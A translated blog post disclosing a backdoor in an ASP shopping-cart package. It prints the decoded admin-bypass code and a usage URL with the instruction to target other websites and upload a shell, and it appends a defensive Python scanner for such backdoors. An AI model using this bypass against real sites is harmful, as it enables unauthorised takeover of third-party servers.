FROM http://www.st999.cn/blog
By wandering
Program: Carefree Shopping System ASP Fashion Edition
Vulnerability: There is a backdoor; you can log in directly and get a shell. I don't know whether this backdoor is original or was added by someone else. I didn't pay attention to it in previous versions.
Download: the webshell is present in the downloads from the following two addresses; the other websites were not viewed.
http://down.admin5.com/asp/3090.html
http://www.onlinedown.net/soft/85106.htm
Webshell file: admin/xyvipSet.asp
I had nothing to do the other day and happened to see "Carefree Shopping System ASP fashion edition V2011.1.19". This version seems to be new. I have looked at previous versions and there were many vulnerabilities. What about this version?
Today I finally had time to download and read it. I had not found a vulnerability yet, but I did find a backdoor, which left me dizzy. No vulnerability found, yet such a large backdoor exists, so what else is there to find...
In the xyvipSet.asp file there is one encrypted section, which surprised me because the rest of the program is not encrypted. What secret is the encryption in this place hiding?
"# @ ~ ^ IQAAAA ==##@ & kW, D; E/DcJmmOkKxEb {Jhm % Z! % R ~ Otx @ # @ & d + ddbWU 'rCNskUE * jacn t! RE @ # @ & d/kkW 'rWVmoE # {F # @ & M +/aGxk + R "n [kM + 1Y ~ JrU9 + aRmdwr #@& n NPrW #@& pCYAAA == #~ @"
After decryption, the plaintext is:
' Any request with action=waj2008 is marked as a logged-in administrator, with no password check
If Request("action") = "waj2008" Then
    Session("admin") = "waj2008"
    Session("flag") = 1
    Response.Redirect "index.asp"
End If
Wow, what an arrogant backdoor.
Usage: http://www.st999.cn/admin/xyvipset.asp?action=waj2008
Replace www.st999.cn with your target website.
Go to the admin back end and use the upload method to get the shell.
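
For anyone auditing a copy of this package, the two signs described above can be checked mechanically: a Script Encoder island inside an otherwise plaintext .asp file, and a request parameter compared to a hardcoded string that then sets Session values. The following Python scanner is an added example, not part of the original post; the function names, the 50% cut-off and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Script Encoder output starts with "#@~^" and ends with "^#~@".
ENCODED = re.compile(r"#@~\^.{8,}?\^#~@", re.DOTALL)
# Plaintext form of the backdoor: a request value compared to a hardcoded
# literal, followed (before End If) by an assignment to a Session key.
GRANT = re.compile(
    r'If\s+Request(?:\.\w+)?\s*\(\s*"[^"]+"\s*\)\s*=\s*"[^"]*"\s*Then'
    r'(?:(?!End\s+If).){0,200}?Session\s*\(\s*"[^"]+"\s*\)\s*=',
    re.IGNORECASE | re.DOTALL)
ASP_SUFFIXES = {".asp", ".asa", ".inc"}
ISLAND_RATIO = 0.5  # assumed cut-off: encoded text under half the file

def inspect(source: str) -> list[str]:
    """Return findings for one ASP source string."""
    findings = []
    spans = [m.span() for m in ENCODED.finditer(source)]
    covered = sum(end - start for start, end in spans)
    if spans and covered < ISLAND_RATIO * len(source):
        findings.append(f"encoded island: {len(spans)} block(s), "
                        f"{covered} of {len(source)} chars")
    for m in GRANT.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        findings.append(f"hardcoded request value sets session, line {line}")
    return findings

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk an unpacked release and report every file with findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ASP_SUFFIXES:
            hits = inspect(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: the blob body is filler, not a real encoded payload.
SAMPLE_ENCODED = (
    '<%\nDim title\ntitle = "Settings"\nResponse.Write title\n%>\n'
    '<%#@~^EAAAAA==FILLER-FILLER-FILLER-AAAAAA==^#~@%>\n'
    '<html><body>store settings form goes here</body></html>\n')
SAMPLE_PLAIN = ('<%\nIf Request("action") = "waj2008" Then\n'
                '    Session("admin") = "waj2008"\nEnd If\n%>\n')

if __name__ == "__main__":
    for name, text in (("encoded", SAMPLE_ENCODED), ("plain", SAMPLE_PLAIN)):
        print(name, inspect(text))
```

A file that is encoded from top to bottom is not flagged by the island check, since that is a vendor's packaging choice; the anomaly is a short encoded block in a page that is otherwise readable.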